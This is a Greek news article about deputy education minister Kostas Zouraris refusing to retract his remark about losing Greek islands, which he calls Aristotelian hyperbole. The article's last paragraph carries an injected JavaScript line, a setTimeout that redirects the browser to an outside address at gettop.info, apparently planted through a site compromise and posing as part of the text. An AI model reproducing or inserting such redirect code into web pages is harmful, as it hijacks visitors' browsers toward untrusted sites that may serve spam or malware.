Ζουράρις: Επιμένω σε όσα είπα για τα ελληνικά νησιά- Δεν παίρνω τίποτα πίσω

0
46

 

Αμετανόητος εμφανίστηκε ο υφυπουργός Παιδείας Κώστας Ζουράρις, μιλώντας στον ραδιοφωνικό σταθμό Real fm 97,8 λέγοντας ότι επιμένει στη δήλωση που έκανε κατά τη διάρκεια συνέντευξης τύπου στο υπουργείο Παιδείας, ότι δεν πειράζει αν χάσουμε και μερικά νησιά, αρκεί να μην χάσουμε την γλώσσα μας.

Παραδέχθηκε ότι το είπε και υποστήριξε ότι η δήλωση του «στον Αριστοτελή λέγεται σχήμα καθ’ υπερβολή».

«Είμαι λόγιος και όπως καταλαβαίνει και η κουτσή Μαρία εκτός από κάποιους δημοσιογράφους που κάνουν ότι δεν καταλαβαίνουν ότι ο Ζουράρις δεν μπορούσε να τα πει αυτά και δεν μπορούσε να τα εννοεί αυτά που εννόησε ο δημοσιογράφος» τόνισε ο κ. Ζουράρις.

Ενώ όταν ρωτήθηκε γιατί έκανε αυτή τη δήλωση ισχυρίστηκε ότι «το σχήμα καθ’ υπερβολή του Αριστοτέλη το έκανα για να δείξω τη γελοιότητα των απαιτήσεων των Τούρκων», αλλά και τη «μηδαμινότητα των επιχειρημάτων πολλών ατόμων στην Ελλάδα που πιστεύουν ότι υπάρχει πραγματική απειλή. Υπάρχει εμφύλιος σπαραγμός στην Τουρκία και παρατεταμένη κρίση. Φοβούνται στην Τουρκία να απογειώσουν αεροσκάφος γιατί υπάρχει περίπτωση να μην γυρίσει».

Όσο για την αναπαραγωγή της δήλωσης ο υφυπουργός Παιδείας τόνισε: «Να αναπαραχθεί η δήλωση αυτή. Θα δείξουν τον συντελεστή ηλιθιότητας τους. Μην απασχολείς τον Ζουράρι και τον ελληνικό λαό με ανοησίες». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here